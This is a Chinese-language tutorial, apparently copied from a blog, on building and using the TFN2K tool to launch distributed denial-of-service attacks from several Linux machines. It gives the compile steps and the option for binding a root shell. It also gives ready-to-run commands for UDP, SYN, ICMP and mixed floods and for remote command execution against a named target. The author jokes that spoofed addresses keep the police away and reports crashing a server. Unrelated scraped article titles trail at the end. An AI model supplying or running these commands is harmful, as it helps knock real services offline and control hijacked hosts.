linux ddos攻击ip,Linux操作系统中实现DDOS攻击的方法
软件用的是最有名的DDOS,首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHATLinux进行测试,本次攻击测试我使用的是FEDORA CORE3。
开始设置服务器:
解压 tar -zxvf tfn2k.tgz
1.安装TFN2K
TFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的Linux需要不同的设置。
先修改src/ip.h
注释掉以下部分,否则编译出错。
/*struct in_addr
{
unsigned long int s_addr;
}; */
然后make进行编译
编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文件td 和 tfn,其中td是守护进程,也是客户机的使用进程。而tfn是服务器控制进程,如果想攻击别人就必需先起动td这个进程,然后再运行服务器进程,否则攻 击无效,更改密码可以执行mkpass进行更改。最后在所有的客户机中安装并运行td(需要ROOT权限),并且在服务器上建立一个文本文件,文件中记录 所有的客户机IP地址(用VI编辑一个就可行了),格式为:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
.....
然后在主服务器上运行./tfn
2.DDOS攻击实现
./tfn直接回车大家可以看到一些参数,英文好的朋友估计不用我来多讲了:)
格式./tfn
无用的参数我们不提,我们来说攻击用的
-f 这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS
-h DOS攻击,也就是单机,一对一的攻击 后面跟一个主机或IP地址
-p 后面指定一个端口,不用说了
-c 最关键的参数,一共有11个选相
0 - 停止攻击,发善心用的
1 - 反欺骗等级设定 ,因为TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的,所以不用担心警察抓,哈哈
2 - 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。
3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个root shell。
4 - UDP洪水攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。
5 - SYN洪水攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力,是标准的拒绝服务攻击.
6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。
7 - SMURF攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。
8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等,轮番轰炸:)
9 - TARGA3攻击
10 - 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制,如:
./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目录建立edison,-i后面跟"命令"
参数基本说完,下面攻击
./tfn -f hostext -c 4 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行UDP攻击(所有的主机中必需已经起动td进程)
./tfn -f hostext -c 5 -i www.xxx.com -p 80
使用hostext文件中记录的主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其他不用说了)
./tfn -f hostext -c 6 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出马上死机)
./tfn -f hostext -c 8 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行ICMP&TCP&UDP轮番攻击(如果对方是sniffer一定哭死)
./tfn -f hostext -c 0
让所由主机停止攻击
基本说完,最后说说我的测试结果
一对一攻击,攻击方式TCP 连接方式本地 本地CPU13% 被攻击的服务器CPU使用率70%以上,并时时波动
二对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击的服务器CPU使用率100%
五对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击的服务器死机.本人家里只有6台机器,但如果再多点,几十台机器,一般的个人服务器肯定要死掉了
一对一攻击,攻击方式ICMP 连接方式本地 本地CPU18% 被攻击的服务器CPU使用率96%以上,并时时波动二对一攻击,攻击方式ICMP 连接方式本地 本地单机CPU18% 被攻击的服务器以经无法上网,几乎无法使用,半小时内死机。
linux ddos攻击ip,Linux操作系统中实现DDOS攻击的方法相关推荐
- linux a卡安装教程视频下载,在深度Deepin操作系统中安装AMD驱动的方法,附安装全过程...
以下为你介绍在深度Deepin操作系统中安装AMD驱动的方法,以选择Radeon Software for Linux Driver for Ubuntu 18.04.3(19.30版本)为例说明. ...
- ddos高防ip防御效果怎么样?ddos高防ip可以防御多大的ddos攻击?
ddos高防ip防御效果怎么样?ddos高防ip可以防御多大的ddos攻击? 1.防护多种DDoS类型攻击 可以防护SYN Flood.UDP Flood.ACK Flood.ICMP Flood.D ...
- Linux拉黑攻击IP,linux服务器如果被cc攻击怎么自动拉黑肉鸡IP(教程篇)
一.Shell 代码 #!/bin/bash#Author:ZhangGe#Desc:Auto Deny Black_IP Script.#Date:2014-11-05#取得参数$1为并发阈值,若留 ...
- linux音乐关机,在Deepin操作系统中关闭或者更改开机关机音乐的方法
如何在Deepin操作系统中关闭或者更改开机关机音乐,下面提供简单可行的方法,比如在Deepin 15.7/15.8系统中可以按照下面的方法关闭或者更改开关机音乐. 在Deepin系统中开关机音乐位置 ...
- linux grep本地ip,linux grep怎么查ip地址
ifconfig是linux中用于显示或配置网络设备(网络接口卡)的命令,英文全称是network interfaces configuring.它能够显示网卡的IP地址.子网掩码.广播地址.硬件地址 ...
- linux mysql 乱码怎么解决_MySQL_linux中解决mysql中文乱码方法,改默认编码:/etc/init.d/my - phpStudy...
linux中解决mysql中文乱码方法 改默认编码: /etc/init.d/mysql start (stop) 为启动和停止服务器 /etc/mysql/ 主要配置文件所在位置 my.cnf /v ...
- linux 软键盘输入密码,Linux_Linux系统中使用屏幕键盘的方法,屏幕键盘可以作为实体键盘输 - phpStudy...
Linux系统中使用屏幕键盘的方法 屏幕键盘可以作为实体键盘输入的替代方案.在某些时候,屏幕键盘显得非常需要. 比如, 你的键盘刚好坏了:你的机器太多,没有足够的键盘:你的机器没有多余的接口来连接键盘 ...
- linux隐藏源ip,linux – NAT后关闭源IP
直到今天我使用了一个便宜的路由器,所以我可以分享我的互联网连接并保持网络服务器在线,同时使用NAT.用户IP($_SERVER ['REMOTE_ADDR'])很好,我看到用户的A类IP. 但随着流量 ...
- linux svn忽略添加,Ubuntu svn 中添加忽略文件的方法
下面为大家简单明了的讲解下Ubuntu svn 中添加忽略文件的方法,使用过 Git 忽略文件的人可能初次接触 svn 的忽略文件的方式不是很习惯,在 git 中,只要添加 .gitignore 文件 ...
最新文章
- poj3422(最小费用流 + 拆点)
- 【图神经网络研究精华】图卷积网络作者Thomas Kipf博士论文公布
- 【关注】人类的智力是如何发展起来的?《自然》发布三大科学假说
- 首创模拟电子计算机,指导日本原子弹投射,这个大佬有点牛
- 【记录】有关parseInt的讨论
- FastDFS介绍并在centos7中安装
- python程序异常实例_Python werkzeug.exceptions方法代码示例
- 点计算机没有本地磁盘,快速解决WinPE系统下没有本地磁盘的方法
- wince内存配置(转gooogleman的工作日志)
- 基于树莓派2代的DIY无线路由器
- Ubuntu 9.10 ati HD 3470 显卡驱动 搞定
- 自己动手打造属于自己的智能家居(二)
- Linux性能测试与调优最常用的15条命令
- python爬虫百度翻译997_python爬取百度翻译返回:{'error': 997, 'from': 'zh', 'to': 'en', ......
- ODBC数据源的作用及配置
- matlab格拉布斯准则程序,基于格拉布斯准则及离群点检测光伏阵列故障检测方法与流程...
- 园林景观cad_景观广场及绿化设计(附CAD平面图)
- 基于MTCNN+arcface的人脸检测和人脸识别
- 隐匿在数据结构背后的原理
- 清新漂亮简约好看的个人博客网站模板
热门文章
- 如何做好视频舆论舆情管理?
- python去掉空格常用方式
- Learning to Denoise Astronomical Images with U-nets笔记(天文图像噪声、损失函数)
- 使用python爬取BOSS直聘岗位数据并做可视化(Boss直聘对网页做了一些修改,现在的代码已经不能用了)
- 死亡爱丽丝服务器维护,《死亡爱丽丝》上线玩家太多 游戏无限期停服维护
- Python10行代码制作企业内网IP地址查询网站
- 如何做出一份赏心悦目的PPT
- 扫地机器人朋友圈文案_扫地机发朋友圈说说
- hdp2.4集成spark2.X
- 三星a52和三星s20fe参数对比哪个好 三星a52和三星s20fe的区别